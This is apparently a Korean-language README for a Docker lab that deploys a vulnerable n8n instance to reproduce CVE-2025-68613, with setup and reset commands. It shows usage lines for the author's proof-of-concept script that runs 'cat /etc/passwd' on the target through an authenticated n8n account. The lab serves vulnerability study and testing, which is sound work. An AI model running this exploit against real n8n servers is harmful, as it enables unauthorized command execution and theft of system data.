
이 실험실은 취약한 n8n 인스턴스에서 CVE-2025-68613을 분석하고 재현할 수 있는 통제된 환경을 제공합니다.
이 저장소는 교육 및 윤리적 목적으로만 사용되는 보안 연구소입니다.
저자는 이 저장소에 제공된 정보, 구성 또는 개념 증명 코드의 오용에 대해 책임을 지지 않습니다.
이 연구소는 PostgreSQL 데이터베이스와 함께 취약한 n8n 인스턴스(v1.120.3) 를 배포하여 통제된 환경에서 CVE-2025-68613의 영향을 연구하고 재현합니다.
이 랩은 다음을 위해 설계되었습니다:
환경이 처음 시작되면 n8n은 웹 인터페이스를 통해 사용자에게 새 계정 생성을 요청합니다.
설치 확인:
docker --version
docker compose version
git clone https://github.com/LingerANR/n8n-CVE-2025-68613.git
cd n8n-CVE-2025-68613
docker compose build --no-cache
docker compose up -d
docker compose logs -f n8n
웹 인터페이스에 접속합니다:
http://localhost:5678
첫 접속 시 n8n은 새 사용자 계정 생성을 요청합니다.
이 연구소는 인증된 조건에서 CVE-2025-68613의 영향을 입증하는 저자가 개발한 사용자 지정 개념 증명과 함께 사용하도록 설계되었습니다.
python3 CVE-2025-68613.py -u http://localhost:5678 -e '[email protected]' -p '.Tester123' --command 'cat /etc/passwd'
python3 CVE-2025-68613.py -u http://localhost:5678 -e '[email protected]' -p '.Tester123' --command 'cat /etc/passwd' --proxy 'http://127.0.0.1:8080'
| 매개변수 | 설명 |
|---|---|
-u | n8n 인스턴스의 URL |
-e | 유효한 인증된 사용자의 이메일 |
-p | 사용자의 비밀번호 |
--command |
PoC는 반드시 이 연구소에서만 실행해야 합니다.
랩(컨테이너, 볼륨 및 데이터)을 완전히 초기화하려면:
docker compose down -v --remove-orphans
그런 다음 다시 빌드합니다:
docker compose up -d --build
이 연구소는 다음을 위해 존재합니다:
모든 테스트는 책임감 있고 합법적으로 수행되어야 합니다.
| 취약한 컨텍스트 내에서 실행되는 명령 |